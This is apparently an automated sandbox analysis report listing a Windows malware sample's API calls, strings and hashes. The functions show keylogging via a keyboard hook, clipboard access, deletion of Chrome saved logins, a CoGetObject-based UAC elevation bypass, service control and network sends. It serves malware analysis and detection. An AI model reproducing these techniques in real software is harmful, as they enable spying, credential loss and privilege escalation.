                                                                                                                                                                                                                                                                                                                              • Instruction ID: ff5f769c9d2eb9d60ee5c92f3007ac3329fe223f24fa54890becbfeace6a8f7f
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db55228f945c143f8b4a38cf357b23bed3cff89228339865896ae8425b8d91ca
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 647182311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A919CA9A
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • OpenClipboard.USER32 ref: 004159C7
                                                                                                                                                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 004159D5
                                                                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                                                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                                                                                                                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                                                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                                                                                                                                                                                                                              • OpenClipboard.USER32 ref: 00415A61
                                                                                                                                                                                                                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 00415A89
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3520204547-0
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: 0$1$2$3$4$5$6$7
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-3177665633
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                                                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                                                                                                                                                                                                                              • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                                                                                                                                                                                                                              • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                                                                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                                                                                                                                                                                                                                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                                                                                                                                                                                                                              • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                                                                                                                                                                                                                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                                                                                                                                                                                                                              • String ID: X[G
                                                                                                                                                                                                                                                                                                                              • API String ID: 1888522110-739899062
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00406788
                                                                                                                                                                                                                                                                                                                              • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Object_wcslen
                                                                                                                                                                                                                                                                                                                              • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                                                                                                                                                                                                                              • API String ID: 240030777-3166923314
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00474918), ref: 004198E8
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419937
• GetLastError.KERNEL32 ref: 00419945
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041997D
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: EnumServicesStatus$ErrorLastManagerOpen
• String ID:
• API String ID: 3587775597-0
APIs
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
• SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
• GetLastError.KERNEL32 ref: 00409A1B
  • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
• TranslateMessage.USER32(?), ref: 00409A7A
• DispatchMessageA.USER32(?), ref: 00409A85
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
• String ID: Keylogger initialization failure: error $`#v
• API String ID: 3219506041-3226811161
APIs
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B539
• DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B546
  • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
• RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
• GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B580
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B593
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
• String ID:
• API String ID: 2341273852-0
APIs
• RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041301A
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00413026
  • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
• LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
• GetProcAddress.KERNEL32(00000000), ref: 004131F4
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                                                                                                                                                                                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                                                                                                                                                                                                              • API String ID: 2127411465-314212984
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040B261
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                                                                                                                                                                                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                                                                                                                                                                                                                                              • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                                                                                                                                                                                                                                              • UserProfile, xrefs: 0040B227
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                                                                                                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                                                                                                                                                                                                                              • API String ID: 2018770650-1062637481
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                                                                                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00416B02
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                                                                                                              • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                                              • API String ID: 3534403312-3733053543
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                                                                              • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040428C: connect.WS2_32(?,007E5980,00000010), ref: 004042A5
                                                                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(0000028C,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: SetEvent.KERNEL32(0000028C,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 4043647387-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 1000744D
                                                                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(000000FF,80000000,00000001,00000000,00000003,00000080,00000000), ref: 100075C9
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 1000765E
                                                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 10007665
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseFileFind$CreateFirstHandle
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3283578348-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041982A,00000000,00000000), ref: 00419BDD
                                                                                                                                                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041982A,00000000,00000000), ref: 00419BF2
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419BFF
                                                                                                                                                                                                                                                                                                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041982A,00000000,00000000), ref: 00419C0A
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1C
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1F
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 276877138-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 50d0eb20569f235c126f5a3ccb9fed10f2149612a0ffcc28dffb27fdb097a1eb
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 029754fb73528063a62336f1848e5bb122dc48601db67947cc2268dfcf3d9ab0
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 50d0eb20569f235c126f5a3ccb9fed10f2149612a0ffcc28dffb27fdb097a1eb
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2EF089755053146FD2115B31FC88DBF2AECEF85BA6B00043AF54193191DB68CD4595F5
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00418ECF
                                                                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F9B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$Find$CreateFirstNext
                                                                                                                                                                                                                                                                                                                              • String ID: @CG$XCG$>G
                                                                                                                                                                                                                                                                                                                              • API String ID: 341183262-3030817687
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 3c09d01da1b6b9b6058f1ffbe336e4d098eaba070b435702f1eced19baeb6da2
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4fcfe6ad4d4b9cbb37a9178feb6c4e4542e518df657a804f5f9e1d603b628f73
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c09d01da1b6b9b6058f1ffbe336e4d098eaba070b435702f1eced19baeb6da2
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 408153315042405BC314FB61C892EEF73A9AFD1718F50493FF946671E2EF389A49C69A
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                                                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                                                                                                                                                                                                              • String ID: PowrProf.dll$SetSuspendState
                                                                                                                                                                                                                                                                                                                              • API String ID: 1589313981-1420736420
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 3a14b14dbf802a9909642b009cac3fcba1cd868148fb9a957c36e01320ebba6d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: a9af72b6b9eaf8561cd509fc4cf8b1c610007ddf0d7e7dc7bbe2947ee761077a
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a14b14dbf802a9909642b009cac3fcba1cd868148fb9a957c36e01320ebba6d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B22161B0604741E6CA14F7B19856AFF225A9F80748F40883FB402A71D2EF7CDC89865F
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 0045128C
                                                                                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 004512B5
                                                                                                                                                                                                                                                                                                                              • GetACP.KERNEL32(?,?,00451512,?,00000000), ref: 004512CA
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                                                                                                                                                                                                                              • Instruction ID: c7787d6075dc192170befbe1ddc6ff7be643600d5f5c624e054d22ce072cfab5
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9621C432A00100A7DB348F55C900B9773A6AF54B66F5685E6FC09F7232E73ADD49C399
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A660
                                                                                                                                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A674
                                                                                                                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67B
                                                                                                                                                                                                                                                                                                                              • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A68A
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                                                                                                              • String ID: SETTINGS
                                                                                                                                                                                                                                                                                                                              • API String ID: 3473537107-594951305
                                                                                                                                                                                                                                                                                                                              APIs
